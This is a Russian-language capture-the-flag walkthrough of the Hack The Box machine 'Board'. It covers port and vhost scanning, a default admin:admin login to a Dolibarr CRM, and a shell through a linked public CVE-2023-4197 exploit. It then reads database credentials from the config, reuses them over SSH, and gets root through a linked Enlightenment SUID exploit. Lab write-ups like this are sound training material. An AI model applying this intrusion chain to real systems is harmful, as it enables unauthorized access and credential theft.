Telegram / Boosty / Видео
Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.
Также на https://boosty.to/kiberdruzhinnik/posts/e04389b5-923a-490b-b5bf-c038c18c16f8 я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.
Обзор сервисов
Быстро пробежимся по открытым портам:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:08
Completed NSE at 06:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:08
Completed NSE at 06:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.38 seconds
Веб
В адресе электронной почты видим название домена, поэтому занесем его в /etc/hosts:
$ sudo nano /etc/hosts
10.129.63.244 board.htb
Сразу же запустим сканирование с помощью gobuster, чтобы попробовать найти другие домены:
$ gobuster vhost -u http://board.htb -w ~/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://board.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kiberdruzhinnik/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
2024/05/26 09:11:59 Starting gobuster in VHOST enumeration mode
===============================================================
Found: crm.board.htb Status: 200 [Size: 6360]
Progress: 4988 / 4990 (99.96%)
===============================================================
2024/05/26 09:13:02 Finished
===============================================================
Нам повезло, и мы нашли такой. Сразу же заносим найденный домен в /etc/hosts по аналогии выше.
Пробуем зайти на него:
Первым же делом вводим admin:admin и провалимся в админку:
Воспользуемся https://github.com/alien-keric/CVE-2023-4197 и получим шелл:
Посмотрим в конфигурацию и обнаружим креды для базы данных MySQL:
$ cd /var/www/html/crm.board.htb/htdocs/conf/
$ cat conf.php
...
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='***';
$dolibarr_main_db_type='mysqli';
...
Далее заглянем в /etc/passwd:
...
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
...
Теперь просто попробуем залогиниться в качестве пользователя larissa с известным нам паролем:
sshpass -p'***' ssh [email protected]
Флаг пользователя
Повышение привилегий
В этом случае достаточно поискать SUID-бинарники и обнаружить вот такие:
$ find / -perm -4000 2>/dev/null
...
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
...
Почти в поиске сразу обнаружим повышение привилегий через enlightment_sys - подробности здесь https://www.exploit-db.com/exploits/51180 или здесь https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh.
Просто копируем содержимое скрипта и вызываем его:
Флаг суперпользователя
